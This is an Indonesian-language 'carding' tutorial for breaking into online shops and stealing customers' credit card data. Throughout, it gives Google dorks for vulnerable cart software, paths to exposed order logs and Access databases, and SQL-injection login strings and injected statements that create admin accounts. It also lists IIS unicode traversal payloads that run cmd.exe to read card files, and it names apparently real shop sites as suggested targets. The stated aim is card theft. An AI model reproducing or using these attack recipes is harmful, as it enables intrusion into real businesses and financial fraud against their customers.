Tutorial Carding Lengkap

TUTORIAL CHECEK LENGKAP

Contoh bugs pada bentuk toko system : shopadmin

Ketik keyword google : allinurl:/shopadmin.asp

Contoh target : www.Target.com/shopadmin.asp

user : 'or'1

pass : 'or'1

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google : allinurl:/store/index.cgi/page=

Contoh target : http://www.Target.com/cgi-bin/store/...short_blue.htm

Hapus short_blue.htm dan ganti dengan :./admin/files/order.log

Hasilnya:http://www.Target.com/cgi-bin/store/...iles/order.log

Contoh bugs pada bentuk toko sistem : metacart

Ketik keyword google.com : allinurl:/metacart/

Contoh target : www.Target.com/metacart/about.asp

Hapus moreinfo.asp dan ganti dengan : --> /database/metacart.mdb

Hasilnya : /www.Target.com/metacart/database/metacart.mdb

Contoh bugs pada bentuk toko sistem ""CShop

Ketik keyword google.com : allinurl:/DCShop/

Contoh : www.Target.com/xxxx/DCShop/xxxx

Hapus /DCShop/xxxx dan ganti dengan

/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt

Hasilnya : www.Target.com/xxxx/DCShop/orders/orders.txt

Contoh bugs pada bentuk toko sistem : EShop

Ketik keyword google.com : allinurl:/eshop/

Contoh : www.Target.com/xxxxx/eshop

Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb

Hasilnya : http://www.Target.com/.../cg-bin/esh...base/order.mdb

Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena
 untuk
membaca database access.mdb sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : PDshopro

Ketik keyword google.com : allinurl:/shop/category.asp/catid=

Contoh : www.Target.com/shop/category.asp/catid=xxxxxx

Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan :
 /admin/dbsetup.asp

Hasilnya : www.Target.com/admin/dbsetup.asp

Dari keterangan diatas , kita dapati file databasenya dgn nama
 sdatapdshoppro.mdb

Download file sdatapdshoppro.mdb dengan merubah url nya menjadi

www.Target.com/data/pdshoppro.mdb

Buka file tsb pakai Microsoft Acces (karena untuk membaca database
 access.mdb
sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : commerceSQL

Ketik keyword google.com : allinurl:/commercesql/

Contoh : www.Target.com/commercesql/xxxxx

Hapus commercesql/xxxxx dan ganti dengan:
 cgi-bin/commercesql/index.cgi?page=

Hasilnya : http://www.Target.com/cgi-bin/commer...ndex.cgi?page=

Untuk melihat admin config

http://www.Target.com/cgi-bin/commer.../admin_conf.pl

Untuk melihat admin manager

http://www.Target.com/cgi-bin/commer...in/manager.cgi

Untuk melihat file log/CCnya

http://www.Target.com/cgi-bin/commer...iles/order.log

Contoh bugs pada bentuk toko sistem : Cart32 v3.5a

Ketik keyword google.com : allinurl:/cart32.exe/

Contoh : http://www.Target.net/wrburns_s/cgi-...xe/NoItemFound

Ganti NoItemFound dengan : error

Bila kita mendapati page error dg keterangan instalasi dibawahnya,
 berarti kita
sukses!

Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
 kebawah, dan
cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat
 list file
dgn format

/akhiran.c32 berarti di site tsb. terdapat file berisi data cc

Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
 text
editor lainnya.

Ganti string url tsb. menjadi seperti ini : http://www.
Target.net/wrburns_s/cgi-bin/cart32/

Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
 dimodifikasi tadi,
dengan format

http://www.Target.com/cart32/

Contoh http://www.Target.net/wrburns_s/cgi-...RNS-001065.c32

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp

Buka url target dan tambahkan string berikut di akhir bagian
 shopdisplayproducts.asp

Contoh :

http://Target.com/vpasp/shopdisplayp...39;a%25'--

Gantilah nilai dari string url terakhir dg:

: %20'a%25'--

: %20'b%25'--

: %20'c%25'--

Kalau berhasil, kita akan mendapatkan informasi username dan password
 admin

Untuk login admin ke http://Target.com/vpasp/shopadmin.asp

silahkan Cari sendiri data CCnya

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut
 satu per
satu pada bagian search engine :

Keyword=&category=5); insert into tbluser (fldusername) values

('')--&SubCategory=&hide=&action.x=46&action.y=6

Keyword=&category=5); update tbluser set fldpassword='' where

fldusername=''--&SubCategory=All&action.x=33&action.y=6

Keyword=&category=3); update tbluser set fldaccess='1' where

fldusername=''--&SubCategory=All&action.x=33&action.y=6

Jangan lupa untuk mengganti dan nya terserah kamu.

Untuk mengganti password admin, masukkan keyword berikut :

Keyword=&category=5); update tbluser set fldpassword='' where

fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://Target/vpasp/shopadmin.asp

Contoh bugs pada bentuk toko sistem : Lobby.asp

Ketik keyword google.com : allinurl: Lobby.asp

Contoh : www.Target.com/mall/lobby.asp

Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb

Hasilnya : www.Target.com/fpdb/shop.mdb

Contoh bugs pada bentuk toko sistem : Shopper.cgi

Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi

Contoh : http://www.Target.com/cgi-local/shop...dd=action&key=

Tambah dengan :...&template=order.log

Hasilnya :

http://www.xxxxxxxx.com/cgi-local/sh...late=order.log

Contoh bugs pada bentuk toko sistem :Proddetail.asp

Ketik keyword google.com : allinurl""roddetail.asp?prod=

Contoh : http://www.Target.org/proddetail.asp...ACSASledRaffle

Hapus tulisan proddtail.asp?prod=SG369

dan ganti dengan --> fpdb/vsproducts.mdb

Hasilnya : www.Target.org/fpdb/vsproducts.mdb

Contoh bugs pada bentuk toko sistem ""igishop

Ketik keyword google.com : inurl:"/cart.php?m="

Contoh : http://Target.com/store/cart.php?m=view.

Hapus tulisan cart.php?m=view

dan ganti dengan -->admin

Hasilnya http://Target.com/store/admin

Trus masukin username sama pass nya pake statment SQL injection

Usename : 'or"="

Password : 'or"="

setelah bisa login, cari data yang diperlukan .

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google.com : allinurl:store/index.cgi/page=

Bugs : ../admin/files/order.log

Example : http://www.target.com/cgi-bin/store/...ir_Manuals.htm

masukin bugsnya : http://www.target.com/cgi-bin/store/...iles/order.log

trus copy-paste tuch log'nya di notepad biar gampang di baca

Contoh bugs pada bentuk toko sistem : Index Cart

Ketik keyword google.com : inurl:"/cart.php?m="

Bugs : Admin

ganti tulisn cart.php?m=view dengan admin

login pake SQl Injection :

username :'or"="

Passwordnya :'or"="

contoh target buat kalian :

https://www.therustybucket.biz/store/admin

Contoh bugs pada bentuk toko sistem : Index cart

Ketik keyword google.com : /ashopKart20/"

bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb

example www.garrysun.com/ashopkart20/addprod.asp

Injection : selanjutnya masukin bugs di atas jadi :
 www.garrysun.com/ashopkart20/admin/scart.mdb

kalo berhasil loe dapet file beresktension .mdb nach file itu

tmn2 open with MS-Acces

Contoh bugs pada bentuk toko sistem : Catid

Ketik keyword google.com : /shop/category.asp/catid=

Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan
 /admin/dbsetup.asp

example : www.littlesport.net/shop/category.asp?catid=2

masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp

kalo berhasil dapet file.mdb trus buka pake MS - Access tapi kalo gagal
 berarti

dah keduluan ma carder yang lain... cari target lain ok..??

Contoh bugs pada bentuk toko sistem : Store

Ketik keyword google.com : inurl:"/store/proddetail.asp?prod="

bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb

Example : http://www.successlink.org/store/pro...prod=SL-IP0001

masukin bugsnya www.successlink.org/store/fpdb/vsproducts.mdb

download file .mdbnya trus buka pake MS- ACCESS..

Contoh bugs pada bentuk toko sistem : Sunshop

Ketik keyword google.com : "Powered by SunShop 3.2"

Atau google dork : inurl:"/sunshop/index.php?action="

Bugs : ganti kata index.php dgn admin

kl ada peringatan java script error klik "OK" aja

Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php

ganti dengan admin http ://www.dohertysgym.com/sunshop/admin

Login pake SQL Injection :

Username : admin

Password :'or''='

Contoh bugs pada bentuk toko sistem : digishop

Ketik keyword google.com

Ketik keyword google.com : "Powered by Digishop 3.2"

Bugs : hapus tulisan cart.php?m= dengan admin

Login pake SQL Injection :

Username : 'or"="

Password : 'or"="

Contoh target :

http://uniquescrapbooks.com.au/store/admin

http://www.7footserb.com/shop/admin

https://www.tangerineclothing.com/admin

Contoh bugs pada bentuk toko sistem :Lobby

Ketik keyword google.com : inurl:"mall/lobby.asp"

bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb

example : Gem Depot Lobby Page - Search our Inventory

jadi http://www.gemdepot.com/fpdb/shop.mdb

dapat dech .mdb ===> trus klik open database JANGAN klik "convert
 databese"
===> klk view orders ====> trus cari orang yg pernah belanja contoh
 pada
customer no 36 trus dimana no CCnya badKiddes....

sabar bro... masih di table customer no 36 then klik payment

*yang ini udah di patch jadi udah ngga bisa lg silakan cari lagi korban
 lainnya

------------------------------------------------------------------------------------------------------------------------------

1. Sama seperti diatas, Cari target dahulu di google.com dgn keyword
 allinurl:/cart32.exe/

2. Misalkan kita mendapat target dg url:

http://www.contoh.com/scripts/cart32.exe/blablabla , maka:

3. Ganti url tsb menjadi ->

http://www.contoh.com/scripts/
4. Modifikasi url tsb dg memasukkan unicode dibelakangnya ->
 http://www.contoh.com/scripts/
5. Contoh unicode utk path /scripts/ : –>
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
Sedangkan utk path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
6. Sebagai contoh, pada url diatas menggunakan path /scripts/ maka
 diubah menjadi
 http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
7. string diakhir unicode dg keterangan dir+c:\ maksudnya kita sedang
 berada dan melist directory c server target!
8. Untuk masuk ke directory cc’s ganti perintahnya unicode dgn ->
 http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
9. Kita akan output list dari file .32 sebagai contoh namanya
 WRBURNS-001065.c32
10. Nah.., utk melihat filenya dg unicode
 http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
11. Kalo tidak berhasil, kita masih bisa mencobanya dengan unicode yg
 laennya.
12. Ok, semoga berhasil, materi ke-2 Selesai.

---------------------------------------------------------------------------------------------------------------------------------
Sekarang,biasa neeh.. Googling dulu untuk mencari target yang memakai
 CMS
OSCOMMERCE. Terserah anda kata kuncinya apa  Gimana??? udah dapet
 target????
Kalau udah, saatnya kita melakukan penyerangan!!

Misalnya target yang anda dapat adalah
 http://www.spyrozone.net/spyrozone
Maka ubahlah URL itu menjadi http://www.spyrozone.net/spyrozone/admin/
 dan
tekan enter. Jika sang admin adalah admin yang lalai, maka.. BOOOOM!!!
 halaman
admin akan terbuka di hadapan anda  Wew.. kita bisa mengakses halaman
 admin
tanpa password!! Hmm… dari sini… terserah anda. Jika anda adalah
 Carder,
maka anda bisa mencuri nomor-nomor kartu kredit ;P